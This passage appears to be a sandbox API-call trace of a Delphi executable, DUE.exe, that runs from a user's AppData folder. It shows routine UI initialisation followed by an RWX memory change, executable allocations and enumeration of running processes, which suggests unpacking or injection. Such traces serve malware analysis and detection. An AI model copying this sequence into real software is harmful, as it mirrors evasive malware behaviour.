cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4 [0096.680] LoadStringA (in: hInstance=0x400000, uID=0xff32, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5 [0096.680] LoadStringA (in: hInstance=0x400000, uID=0xff31, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6 [0096.680] LoadStringA (in: hInstance=0x400000, uID=0xff30, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3 [0096.680] LoadStringA (in: hInstance=0x400000, uID=0xff4f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3 [0096.680] LoadStringA (in: hInstance=0x400000, uID=0xff4e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4 [0096.680] LoadStringA (in: hInstance=0x400000, uID=0xff4d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5 [0096.680] LoadStringA (in: hInstance=0x400000, uID=0xff4c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2 [0096.680] LoadStringA (in: hInstance=0x400000, uID=0xff4b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4 [0096.680] LoadStringA (in: hInstance=0x400000, uID=0xff4a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4 [0096.680] LoadStringA (in: hInstance=0x400000, uID=0xff49, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3 [0096.680] LoadStringA (in: hInstance=0x400000, uID=0xff48, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4 [0096.680] LoadStringA (in: hInstance=0x400000, uID=0xff47, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4 [0096.680] LoadStringA (in: hInstance=0x400000, uID=0xff46, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5 [0096.680] LoadStringA (in: hInstance=0x400000, uID=0xff45, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5 [0096.680] LoadStringA (in: hInstance=0x400000, uID=0xff44, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3 [0096.680] LoadStringA (in: hInstance=0x400000, uID=0xff43, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3 [0096.680] LoadStringA (in: hInstance=0x400000, uID=0xff42, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4 [0096.681] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0e7 [0096.681] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0f8 [0096.681] GetCurrentThreadId () returned 0xe70 [0096.681] GlobalAddAtomA (lpString="WndProcPtr0040000000000E70") returned 0xc14b [0096.681] LoadStringA (in: hInstance=0x400000, uID=0xfef0, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb [0096.681] LoadStringA (in: hInstance=0x400000, uID=0xff0f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc [0096.681] LoadStringA (in: hInstance=0x400000, uID=0xff0e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11 [0096.681] LoadStringA (in: hInstance=0x400000, uID=0xff0d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8 [0096.681] LoadStringA (in: hInstance=0x400000, uID=0xff0c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe [0096.681] LoadStringA (in: hInstance=0x400000, uID=0xff0b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa [0096.681] LoadStringA (in: hInstance=0x400000, uID=0xff0a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4 [0096.681] LoadStringA (in: hInstance=0x400000, uID=0xff09, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9 [0096.681] LoadStringA (in: hInstance=0x400000, uID=0xff08, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf [0096.681] LoadStringA (in: hInstance=0x400000, uID=0xff07, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9 [0096.681] LoadStringA (in: hInstance=0x400000, uID=0xff06, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf [0096.681] LoadStringA (in: hInstance=0x400000, uID=0xff05, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15 [0096.681] LoadStringA (in: hInstance=0x400000, uID=0xff04, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10 [0096.681] LoadStringA (in: hInstance=0x400000, uID=0xff03, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf [0096.681] LoadStringA (in: hInstance=0x400000, uID=0xff02, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe [0096.681] LoadStringA (in: hInstance=0x400000, uID=0xff01, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14 [0096.682] LoadStringA (in: hInstance=0x400000, uID=0xff00, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9 [0096.682] LoadStringA (in: hInstance=0x400000, uID=0xff1f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7 [0096.682] LoadStringA (in: hInstance=0x400000, uID=0xff1e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc [0096.682] LoadStringA (in: hInstance=0x400000, uID=0xff1d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb [0096.682] LoadStringA (in: hInstance=0x400000, uID=0xff1c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd [0096.682] LoadStringA (in: hInstance=0x400000, uID=0xff1b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10 [0096.682] LoadStringA (in: hInstance=0x400000, uID=0xff1a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb [0096.682] LoadStringA (in: hInstance=0x400000, uID=0xff19, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa [0096.682] LoadStringA (in: hInstance=0x400000, uID=0xff18, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15 [0096.682] LoadStringA (in: hInstance=0x400000, uID=0xff17, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe [0096.682] LoadStringA (in: hInstance=0x400000, uID=0xff16, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd [0096.682] LoadStringA (in: hInstance=0x400000, uID=0xff15, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb [0096.682] LoadStringA (in: hInstance=0x400000, uID=0xff14, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5 [0096.682] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8 [0096.682] LoadStringA (in: hInstance=0x400000, uID=0xff12, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb [0096.682] LoadStringA (in: hInstance=0x400000, uID=0xff11, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5 [0096.682] LoadStringA (in: hInstance=0x400000, uID=0xff10, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4 [0096.682] LoadStringA (in: hInstance=0x400000, uID=0xff2f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7 [0096.682] LoadStringA (in: hInstance=0x400000, uID=0xff2e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4 [0096.682] LoadStringA (in: hInstance=0x400000, uID=0xff2d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6 [0096.682] LoadStringA (in: hInstance=0x400000, uID=0xff2c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4 [0096.682] LoadStringA (in: hInstance=0x400000, uID=0xff2b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3 [0096.682] LoadStringA (in: hInstance=0x400000, uID=0xff2a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6 [0096.682] LoadStringA (in: hInstance=0x400000, uID=0xff29, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4 [0096.682] LoadStringA (in: hInstance=0x400000, uID=0xff28, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4 [0096.682] LoadStringA (in: hInstance=0x400000, uID=0xff27, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6 [0096.682] LoadStringA (in: hInstance=0x400000, uID=0xff26, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4 [0096.682] LoadStringA (in: hInstance=0x400000, uID=0xff25, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5 [0096.682] LoadStringA (in: hInstance=0x400000, uID=0xff24, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5 [0096.682] LoadStringA (in: hInstance=0x400000, uID=0xff23, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6 [0096.682] LoadStringA (in: hInstance=0x400000, uID=0xff22, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5 [0096.682] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc1f3 [0096.683] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc1f4 [0096.683] GetVersion () returned 0x1db10106 [0096.683] GetCurrentProcessId () returned 0xe6c [0096.683] GlobalAddAtomA (lpString="Delphi00000E6C") returned 0xc14a [0096.683] GetCurrentThreadId () returned 0xe70 [0096.683] GlobalAddAtomA (lpString="ControlOfs0040000000000E70") returned 0xc149 [0096.683] RegisterClipboardFormatA (lpszFormat="ControlOfs0040000000000E70") returned 0xc1f5 [0096.683] GetProcAddress (hModule=0x770d0000, lpProcName="GetMonitorInfoA") returned 0x770f4413 [0096.683] GetProcAddress (hModule=0x770d0000, lpProcName="GetSystemMetrics") returned 0x770e7d2f [0096.683] GetSystemMetrics (nIndex=19) returned 1 [0096.691] GetSystemMetrics (nIndex=75) returned 1 [0096.691] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x1de1320, fWinIni=0x0 | out: pvParam=0x1de1320) returned 1 [0096.691] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0096.692] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0096.692] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x102f1 [0096.692] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b [0096.693] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019 [0096.693] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017 [0096.693] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0x102f3 [0096.693] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0x102f5 [0096.693] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0x102f7 [0096.693] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0x102f9 [0096.694] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0x102fb [0096.694] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0x102fd [0096.694] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0096.694] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b [0096.694] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011 [0096.694] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d [0096.694] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013 [0096.694] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f [0096.695] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0096.695] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005 [0096.695] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009 [0096.695] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0096.695] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0096.695] GetDC (hWnd=0x0) returned 0x1010ac2 [0096.695] GetDeviceCaps (hdc=0x1010ac2, index=90) returned 96 [0096.695] ReleaseDC (hWnd=0x0, hDC=0x1010ac2) returned 1 [0096.695] GetProcAddress (hModule=0x770d0000, lpProcName="EnumDisplayMonitors") returned 0x770f451a [0096.695] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x4505a4, dwData=0x1de156c) returned 1 [0096.695] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x18fe97, fWinIni=0x0 | out: pvParam=0x18fe97) returned 1 [0096.696] CreateFontIndirectA (lplf=0x18fe97) returned 0xb0a0b0c [0096.696] GetObjectA (in: h=0xb0a0b0c, c=60, pv=0x18fc88 | out: pv=0x18fc88) returned 60 [0096.696] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x18fd43, fWinIni=0x0 | out: pvParam=0x18fd43) returned 1 [0096.696] CreateFontIndirectA (lplf=0x18fe1f) returned 0xa0a0b0a [0096.696] GetObjectA (in: h=0xa0a0b0a, c=60, pv=0x18fc88 | out: pv=0x18fc88) returned 60 [0096.696] CreateFontIndirectA (lplf=0x18fde3) returned 0xa0a0b0b [0096.696] GetObjectA (in: h=0xa0a0b0b, c=60, pv=0x18fc88 | out: pv=0x18fc88) returned 60 [0096.697] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0x102ff [0096.707] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18fdf7, nSize=0x100 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DUE.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\due.exe")) returned 0x29 [0096.708] OemToCharA (in: pSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DUE.exe", pDst=0x18fdf7 | out: pDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DUE.exe") returned 1 [0096.708] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x210000 [0096.708] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0x18fdac | out: lpWndClass=0x18fdac) returned 0 [0096.708] RegisterClassA (lpWndClass=0x46de54) returned 0xc5c1f7 [0096.708] GetSystemMetrics (nIndex=0) returned 1440 [0096.708] GetSystemMetrics (nIndex=1) returned 900 [0096.708] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="Due", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x102f8 [0096.717] SetWindowLongA (hWnd=0x102f8, nIndex=-4, dwNewLong=2166767) returned 4219884 [0096.717] SendMessageA (hWnd=0x102f8, Msg=0x80, wParam=0x1, lParam=0x102ff) returned 0x0 [0096.718] NtdllDefWindowProc_A (hWnd=0x102f8, Msg=0x80, wParam=0x1, lParam=0x102ff) returned 0x0 [0096.750] NtdllDefWindowProc_A (hWnd=0x102f8, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x10301 [0096.753] SetClassLongA (hWnd=0x102f8, nIndex=-14, dwNewLong=66303) returned 0x0 [0096.753] GetSystemMenu (hWnd=0x102f8, bRevert=0) returned 0x10307 [0096.755] DeleteMenu (hMenu=0x10307, uPosition=0xf030, uFlags=0x0) returned 1 [0096.756] DeleteMenu (hMenu=0x10307, uPosition=0xf000, uFlags=0x0) returned 1 [0096.756] DeleteMenu (hMenu=0x10307, uPosition=0xf010, uFlags=0x0) returned 1 [0096.756] GetKeyboardLayoutList (in: nBuff=64, lpList=0x18fd78 | out: lpList=0x18fd78) returned 1 [0096.757] GetModuleHandleA (lpModuleName="USER32") returned 0x770d0000 [0096.757] GetProcAddress (hModule=0x770d0000, lpProcName="AnimateWindow") returned 0x770fb531 [0096.758] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x751e0000 [0096.758] GetProcAddress (hModule=0x751e0000, lpProcName="InitializeFlatSB") returned 0x7521266f [0096.758] GetProcAddress (hModule=0x751e0000, lpProcName="UninitializeFlatSB") returned 0x75212542 [0096.759] GetProcAddress (hModule=0x751e0000, lpProcName="FlatSB_GetScrollProp") returned 0x75211d29 [0096.759] GetProcAddress (hModule=0x751e0000, lpProcName="FlatSB_SetScrollProp") returned 0x7521238d [0096.759] GetProcAddress (hModule=0x751e0000, lpProcName="FlatSB_EnableScrollBar") returned 0x752120c9 [0096.759] GetProcAddress (hModule=0x751e0000, lpProcName="FlatSB_ShowScrollBar") returned 0x75211fdb [0096.759] GetProcAddress (hModule=0x751e0000, lpProcName="FlatSB_GetScrollRange") returned 0x75211e8d [0096.759] GetProcAddress (hModule=0x751e0000, lpProcName="FlatSB_GetScrollInfo") returned 0x75211f0f [0096.759] GetProcAddress (hModule=0x751e0000, lpProcName="FlatSB_GetScrollPos") returned 0x75211ccd [0096.759] GetProcAddress (hModule=0x751e0000, lpProcName="FlatSB_SetScrollPos") returned 0x7521216d [0096.759] GetProcAddress (hModule=0x751e0000, lpProcName="FlatSB_SetScrollInfo") returned 0x752122be [0096.760] GetProcAddress (hModule=0x751e0000, lpProcName="FlatSB_SetScrollRange") returned 0x752121e2 [0096.760] GetModuleHandleA (lpModuleName="User32.dll") returned 0x770d0000 [0096.760] GetProcAddress (hModule=0x770d0000, lpProcName="SetLayeredWindowAttributes") returned 0x7710ec88 [0096.760] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc0bf [0096.760] LoadBitmapA (hInstance=0x0, lpBitmapName=0x7ff7) returned 0x3f050b17 [0096.760] GetObjectA (in: h=0x3f050b17, c=84, pv=0x18fed0 | out: pv=0x18fed0) returned 24 [0096.761] DeleteObject (ho=0x3f050b17) returned 1 [0096.761] RegisterClipboardFormatA (lpszFormat="Link") returned 0xc197 [0096.761] DdeInitializeA (in: pidInst=0x1de1ee0, pfnCallback=0x459c74, afCmd=0x0, ulRes=0x0 | out: pidInst=0x1de1ee0) returned 0x0 [0096.764] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18fe00, nSize=0x105 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DUE.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\due.exe")) returned 0x29 [0096.764] DdeCreateStringHandleA (idInst=0x1000080, psz="DUE", iCodePage=1004) returned 0xc000 [0096.765] DdeNameService (idInst=0x1000080, hsz1=0xc000, hsz2=0x0, afCmd=0x1) returned 0x1 [0096.768] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x46fc24, nSize=0x100 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DUE.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\due.exe")) returned 0x29 [0096.768] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0096.768] SelectPalette (hdc=0x0, hPal=0x0, bForceBkgd=0) returned 0x0 [0096.768] GetLastError () returned 0x6 [0096.768] GetLocalTime (in: lpSystemTime=0x46fc04 | out: lpSystemTime=0x46fc04*(wYear=0x7e4, wMonth=0x8, wDayOfWeek=0x2, wDay=0x4, wHour=0x17, wMinute=0x19, wSecond=0x1e, wMilliseconds=0x1db)) [0096.768] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0096.768] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x46fbfc | out: lpSystemTimeAsFileTime=0x46fbfc*(dwLowDateTime=0x8b206320, dwHighDateTime=0x1d66ab6)) [0096.768] FileTimeToSystemTime (in: lpFileTime=0x46fbfc, lpSystemTime=0x46fc14 | out: lpSystemTime=0x46fc14) returned 1 [0096.768] VirtualProtect (in: lpAddress=0x45c361, dwSize=0xfd9d, flNewProtect=0x40, lpflOldProtect=0x18ff24 | out: lpflOldProtect=0x18ff24*=0x20) returned 1 [0096.772] VirtualAlloc (lpAddress=0x0, dwSize=0x31c, flAllocationType=0x3000, flProtect=0x4) returned 0x260000 [0096.813] LoadLibraryA (lpLibFileName="shell32") returned 0x76260000 [0096.814] LoadLibraryA (lpLibFileName="user32") returned 0x770d0000 [0096.814] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2f0000 [0096.815] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f894, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DUE.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\due.exe")) returned 0x29 [0096.815] VirtualAlloc (lpAddress=0x0, dwSize=0x7fee0, flAllocationType=0x3000, flProtect=0x4) returned 0x370000 [0096.815] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe4 [0096.826] Process32FirstW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0096.827] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0096.827] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0096.828] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0096.829] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0096.829] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0096.830] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0096.830] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0096.831] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0096.832] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0096.833] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.833] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.834] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.834] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.835] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x33, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.835] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0096.836] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.837] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.837] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0096.838] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0096.838] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 